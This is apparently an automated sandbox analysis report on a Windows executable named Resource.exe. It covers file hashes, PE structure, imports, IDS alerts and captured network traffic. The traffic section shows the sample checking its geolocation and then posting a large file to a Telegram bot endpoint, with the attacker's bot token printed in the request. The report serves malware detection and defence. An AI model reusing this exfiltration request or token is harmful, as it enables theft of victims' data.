Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	311
Entropy (8bit):	4.7612475217867205
Encrypted:	false
SSDEEP:	6:PzjAcmflvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG13:Pg/N5pTcgTcgTLs4omvtAFSkIrxMVlmo
MD5:	C28307C869E1E06FBA6ED6A0B5C3ADA5
SHA1:	611CF15C51C331FF11BA5DAD8ACA9DFE466425C4
SHA-256:	AB97D6455B258BCD450C45662AC23458ECF9EB1D7804FD53215514CABCCE035C
SHA-512:	9A5838A2BD7814B27AEF7F293A8A02D1B343F1DED7240880D32887BCE736E5CC37FCA8CE7EB51589BDDDB2614E304BD9BF226BE605232C24D65235D83DA16B0F
Malicious:	false
Preview:	..Pinging 305090 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.99311078420396
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Resource.exe
File size:	7'714'511 bytes
MD5:	cd56d1639c638ef44a1cbcf6756ef2ba
SHA1:	784970f33b026fe770d8c0f8938d17b26c428327
SHA256:	79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
SHA512:	c00a3be6d4cbc672b4fe3b4afb5072832a870c99d795656380e23d33e9b7b45f2d0851ba86e1d35fe502af2d001cf13e13ff6d431349dc166cfbdcc54bb19b39
SSDEEP:	196608:qw0cDemLjv+bhqNVoBKUh8mz4Iv9Pmu1D7wJo:SieaL+9qz8/b4IsuRmo
TLSH:	FE763325A3950CE9E82B863DC286C55ADF7336620760D5CB93F893392F039D5D83BB16
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................

File Icon


Icon Hash:	0f134d455561070f

Static PE Info

General

Entrypoint:	0x14000c1f0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x659C3416 [Mon Jan 8 17:42:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	1af6c885af093afc55142c2f1761dbe8

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 02:00:00 29/09/2024 01:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F1E48AF3A8Ch
dec eax
add esp, 28h
jmp 00007F1E48AF369Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F1E48AF4004h
test eax, eax
je 00007F1E48AF3843h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F1E48AF3827h
dec eax
cmp ecx, eax
je 00007F1E48AF3836h
xor eax, eax
dec eax
cmpxchg dword ptr [0003427Ch], ecx
jne 00007F1E48AF3810h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F1E48AF3819h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [00034267h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [00034257h], al
call 00007F1E48AF3E03h
call 00007F1E48AF4F22h
test al, al
jne 00007F1E48AF3826h
xor al, al
jmp 00007F1E48AF3836h
call 00007F1E48B01EC1h
test al, al
jne 00007F1E48AF382Bh
xor ecx, ecx
call 00007F1E48AF4F32h
jmp 00007F1E48AF380Ch
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003421Ch], 00000000h
mov ebx, ecx
jne 00007F1E48AF3889h
cmp ecx, 01h
jnbe 00007F1E48AF388Ch
call 00007F1E48AF3F6Ah
test eax, eax
je 00007F1E48AF384Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3cdcc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x931c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x42000	0x22a4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x759287	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x50000	0x75c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a330	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a1f0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x420	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29c90	0x29e00	62616acf257019688180f494b4eb78d4	False	0.5523087686567164	data	6.4831047330596565	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12bf4	0x12c00	f1a0eee172d3f361c6916681463cac8b	False	0.5184765625	data	5.835053788880779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x3338	0xe00	99d84572872f2ce8d9bdbc2521e1966e	False	0.1328125	Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 0	1.8271683819747706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x42000	0x22a4	0x2400	39f0a7d8241a665fc55289b5f9977819	False	0.4720052083333333	data	5.316391891279308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x45000	0x15c	0x200	624222957a635749731104f8cdf6f9b7	False	0.38671875	data	2.83326547900447	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0x931c	0x9400	b212016c18ddafbb428bf52b4ef92372	False	0.9474239864864865	data	7.892798817333006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x50000	0x75c	0x800	4138d4447f190c2657ec208ef31be551	False	0.5458984375	data	5.240127521097618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x46250	0x315	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.0139416983523448
RT_ICON	0x46568	0x57b	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0078403421240199
RT_ICON	0x46ae4	0x80b	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0053423992229238
RT_ICON	0x472f0	0xd10	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.0032894736842106
RT_ICON	0x48000	0x1251	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.002345915973555
RT_ICON	0x49254	0x27f7	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	0.9981428990323526
RT_ICON	0x4ba4c	0x2fdc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9893078681031668
RT_GROUP_ICON	0x4ea28	0x68	data	0.75
RT_VERSION	0x4ea90	0x37c	data	0.47533632286995514
RT_MANIFEST	0x4ee0c	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T16:18:39.056741+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.5	49853	149.154.167.220	443	TCP
2025-01-06T16:18:39.056871+0100	2857751	ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)	1	192.168.2.5	49853	149.154.167.220	443	TCP
2025-01-06T16:18:40.033280+0100	2857752	ETPRO MALWARE SynthIndi Loader CnC Response	1	149.154.167.220	443	192.168.2.5	49853	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 16:17:59.311427116 CET	49709	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:17:59.316190958 CET	80	49709	208.95.112.1	192.168.2.5
Jan 6, 2025 16:17:59.318157911 CET	49709	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:17:59.318236113 CET	49709	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:17:59.322983980 CET	80	49709	208.95.112.1	192.168.2.5
Jan 6, 2025 16:17:59.807560921 CET	80	49709	208.95.112.1	192.168.2.5
Jan 6, 2025 16:17:59.812340021 CET	49709	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:17:59.817341089 CET	80	49709	208.95.112.1	192.168.2.5
Jan 6, 2025 16:17:59.817400932 CET	49709	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:18:37.501811981 CET	49849	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:18:37.506618023 CET	80	49849	208.95.112.1	192.168.2.5
Jan 6, 2025 16:18:37.506699085 CET	49849	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:18:37.506776094 CET	49849	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:18:37.511518002 CET	80	49849	208.95.112.1	192.168.2.5
Jan 6, 2025 16:18:38.155705929 CET	80	49849	208.95.112.1	192.168.2.5
Jan 6, 2025 16:18:38.205959082 CET	49849	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:18:38.409876108 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:38.409921885 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:38.409987926 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:38.439152002 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:38.439173937 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.051090002 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.052891970 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.052906036 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.054256916 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.054312944 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.056173086 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.056241035 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.056468010 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.056474924 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.056550026 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.056574106 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.056674004 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.056704044 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.056794882 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.056822062 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057009935 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057025909 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057050943 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057061911 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057229042 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057235956 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057257891 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057265043 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057275057 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057285070 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057301044 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057307959 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057326078 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057337046 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057387114 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057395935 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057410955 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057416916 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057432890 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057439089 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057454109 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057471037 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057480097 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057487011 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057492971 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057497025 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057513952 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057518005 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057531118 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057538033 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057548046 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057554007 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057574034 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057579041 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.057593107 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057600975 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057606936 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057642937 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057662964 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057677031 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057722092 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057743073 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057749987 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057765961 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.057807922 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.066852093 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.067188978 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067205906 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.067224026 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067240953 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067255974 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067265987 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067303896 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067344904 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067356110 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067372084 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067380905 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067404032 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.067436934 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.071846008 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.071970940 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.071990013 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.071990967 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072002888 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072019100 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072041035 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.072052002 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072061062 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:39.072082043 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072096109 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072114944 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:39.072932005 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:40.033054113 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:40.033076048 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:40.033174992 CET	443	49853	149.154.167.220	192.168.2.5
Jan 6, 2025 16:18:40.033178091 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:40.033230066 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:40.033951044 CET	49853	443	192.168.2.5	149.154.167.220
Jan 6, 2025 16:18:40.131159067 CET	49849	80	192.168.2.5	208.95.112.1
Jan 6, 2025 16:18:40.136203051 CET	80	49849	208.95.112.1	192.168.2.5
Jan 6, 2025 16:18:40.136651039 CET	49849	80	192.168.2.5	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 16:17:57.871493101 CET	59269	53	192.168.2.5	1.1.1.1
Jan 6, 2025 16:17:57.880270004 CET	53	59269	1.1.1.1	192.168.2.5
Jan 6, 2025 16:17:59.296700001 CET	56785	53	192.168.2.5	1.1.1.1
Jan 6, 2025 16:17:59.303673029 CET	53	56785	1.1.1.1	192.168.2.5
Jan 6, 2025 16:18:37.494462967 CET	63949	53	192.168.2.5	1.1.1.1
Jan 6, 2025 16:18:37.501096964 CET	53	63949	1.1.1.1	192.168.2.5
Jan 6, 2025 16:18:38.401953936 CET	59817	53	192.168.2.5	1.1.1.1
Jan 6, 2025 16:18:38.408791065 CET	53	59817	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 6, 2025 16:17:57.871493101 CET	192.168.2.5	1.1.1.1	0xb188	Standard query (0)	blank-63z6o.in	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:17:59.296700001 CET	192.168.2.5	1.1.1.1	0x928a	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:18:37.494462967 CET	192.168.2.5	1.1.1.1	0xb836	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:18:38.401953936 CET	192.168.2.5	1.1.1.1	0x6b08	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 6, 2025 16:17:57.880270004 CET	1.1.1.1	192.168.2.5	0xb188	Name error (3)	blank-63z6o.in	none	none	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:17:59.303673029 CET	1.1.1.1	192.168.2.5	0x928a	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:18:37.501096964 CET	1.1.1.1	192.168.2.5	0xb836	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 6, 2025 16:18:38.408791065 CET	1.1.1.1	192.168.2.5	0x6b08	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	208.95.112.1	80	6048	C:\Users\user\Desktop\Resource.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:17:59.318236113 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.1.0
Jan 6, 2025 16:17:59.807560921 CET	175	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 15:17:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49849	208.95.112.1	80	6048	C:\Users\user\Desktop\Resource.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:18:37.506776094 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.1.0
Jan 6, 2025 16:18:38.155705929 CET	381	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 15:18:37 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 21 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49853	149.154.167.220	443	6048	C:\Users\user\Desktop\Resource.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-06 15:18:39 UTC	268	OUT	POST /bot6723507541:AAFus4a_vfOH23XVGo8SFLxAeDedGw1G3vk/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 757011 User-Agent: python-urllib3/2.1.0 Content-Type: multipart/form-data; boundary=4f135cb48c13ab6db74f60ce4e8d2c0e
